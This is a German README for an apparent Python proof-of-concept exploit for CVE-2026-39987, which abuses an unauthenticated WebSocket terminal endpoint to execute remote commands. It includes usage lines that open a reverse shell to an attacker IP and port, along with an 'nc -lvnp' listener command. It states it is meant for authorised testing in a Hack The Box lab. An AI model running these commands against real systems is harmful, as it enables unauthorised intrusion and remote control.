
Python-Proof-of-Concept für CVE-2026-39987, das einen nicht authentifizierten WebSocket-Terminal-Endpunkt ausnutzt, um Remote-Befehlsausführung und Reverse-Shell-Zugriff zu erreichen.
Proof of Concept für CVE-2026-39987, das die Ausführung von Befehlen aus der Ferne über den verwundbaren WebSocket-Terminal-Endpunkt demonstriert.
Haftungsausschluss: Dieses PoC ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke gedacht. Verwende es nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.
Die Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, mit dem WebSocket-Terminal-Endpunkt der Anwendung zu interagieren und Befehle aus der Ferne auszuführen.
Das PoC verbindet sich mit:
wss://<target>/terminal/ws
und demonstriert die Befehlsausführung über die WebSocket-Verbindung.
Das Ziel, das während der Entwicklung/dieses Tests dieses PoC verwendet wurde, war eine autorisierte Hack The Box-Laborumgebung.
websocket-clientInstalliere die erforderliche Bibliothek:
pip3 install websocket-client
python3 test.py <domain>
Beispiel:
python3 test.py somesite.com
Das PoC stellt die WebSocket-Verbindung her und führt einen Testbefehl aus.
Das PoC unterstützt auch eine Reverse-Shell-Option:
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>
Beispiel:
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444
Starte den Listener, bevor du das PoC ausführst:
nc -lvnp 4444
Die Anwendung stellt einen WebSocket-Terminal-Endpunkt bereit, ohne eine Authentifizierung zu erfordern.
Das PoC:
Das anfängliche ws.recv() ist wichtig, da der Server die Shell-Eingabeaufforderung unmittelbar nach dem Herstellen der Verbindung sendet.